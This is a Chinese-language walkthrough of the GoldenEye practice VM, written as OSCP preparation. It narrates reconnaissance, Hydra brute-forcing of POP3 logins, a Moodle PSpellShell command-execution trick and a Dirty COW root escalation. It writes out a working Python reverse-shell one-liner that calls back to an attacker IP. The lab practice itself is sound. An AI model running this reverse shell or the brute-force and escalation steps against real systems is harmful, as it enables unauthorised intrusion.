前言

最近比较闲,做一做靶场,让我这个菜鸡感受一下自己到底有多菜
靶场地址
备战OSCP_GoldenEye1 - 图1

发现靶机

备战OSCP_GoldenEye1 - 图2
目标IP:192.168.110.129

信息收集

nmap信息
备战OSCP_GoldenEye1 - 图3
目录扫描信息
Dirsearch扫描80未发现什么目录
备战OSCP_GoldenEye1 - 图4

渗透测试

在主页显示/sev-home/目录可以登录
备战OSCP_GoldenEye1 - 图5
打开目录发现需要凭证
备战OSCP_GoldenEye1 - 图6
查看页面源码发现有个terminal.js,跟进发现密文和俩人名
备战OSCP_GoldenEye1 - 图7
密文解密为:
备战OSCP_GoldenEye1 - 图8
登录进去就发现这个页面(账号密码这卡了好久,后来发现是tm小写,boris/InvincibleHack3r)
备战OSCP_GoldenEye1 - 图9
根据提示,Hydra爆破pop3服务发现两个账户密码:boris/secret1! ,natalya/bird
备战OSCP_GoldenEye1 - 图10
google一下可以用telnet,尝试连接pop3,boris里面没啥重要的东西,在natalya里面找到了一个域名和账号密码
备战OSCP_GoldenEye1 - 图11
备战OSCP_GoldenEye1 - 图12
根据提示,修改/etc/hosts,指定IP和域名
备战OSCP_GoldenEye1 - 图13
用上面的给出的账号密码,登录 severnaya-station.com/gnocertdir 后,找到一个消息,里面指出了一个叫doak的运营主管。
备战OSCP_GoldenEye1 - 图14
再次hydra爆破doak的密码
备战OSCP_GoldenEye1 - 图15
telnet登录,查看邮件内容:
备战OSCP_GoldenEye1 - 图16
使用给出的账号密码,登录系统,进去看到一个s3cret.txt的文件
备战OSCP_GoldenEye1 - 图17
其内容指向一个图片路径
备战OSCP_GoldenEye1 - 图18
就真的是个图片
备战OSCP_GoldenEye1 - 图19
在图片属性中有一个base64编码
备战OSCP_GoldenEye1 - 图20
解出来为
备战OSCP_GoldenEye1 - 图21
根据上文s3cret.txt的内容,猜测应该是adm1n的密码
结果,吐了,不是adm1n的,是admin的
备战OSCP_GoldenEye1 - 图22
进去之后没发现啥有用的,看了一下答案说要找cms的漏洞:moodle 2.2.3
Google之后发现metasploit有rce脚本。
备战OSCP_GoldenEye1 - 图23
需要添加一下密码,域名和目录
备战OSCP_GoldenEye1 - 图24
试了好几遍失败了,查了资料才知道要改东西
到这个目录里面把拼写引擎改为Pspellshell
备战OSCP_GoldenEye1 - 图25
浪费大家时间了,又失败了,没找到原因,看了别人的wp,试试另外一个方法
第一步:
在目录下写入python反弹shell的脚本
备战OSCP_GoldenEye1 - 图26

  1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.128",65530));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

第二步:
将下面改为PspellShell
备战OSCP_GoldenEye1 - 图27
第三步:
Kali上开启监听
备战OSCP_GoldenEye1 - 图28
第四步:
在对应Blogs下add a new entry,填点东西,然后点击最后一个ABC的按钮
备战OSCP_GoldenEye1 - 图29
成功getshell
备战OSCP_GoldenEye1 - 图30
获取一个tty的shell
备战OSCP_GoldenEye1 - 图31

内核提权

低权限:
备战OSCP_GoldenEye1 - 图32
看了一圈suid没发现可以利用的
内核提权吧
先wget一个提权脚本到靶机的tmp目录下
然后执行发现可用脏牛提权cve-2016-5195
备战OSCP_GoldenEye1 - 图33
把脏牛wget到靶机
备战OSCP_GoldenEye1 - 图34
编译一下,发现没有gcc,但是有cc
备战OSCP_GoldenEye1 - 图35
成功获取root
备战OSCP_GoldenEye1 - 图36
找flag
备战OSCP_GoldenEye1 - 图37
备战OSCP_GoldenEye1 - 图38
结束
备战OSCP_GoldenEye1 - 图39

总结

GoldenEye这个靶场脑洞着实有点大,很多细节点稍有不注意或没想到就会卡很久,这个靶场做下来我大概花了3、4天,其中断过好几次,也有好几次想放弃了,但是坚持一下也做完了,舒服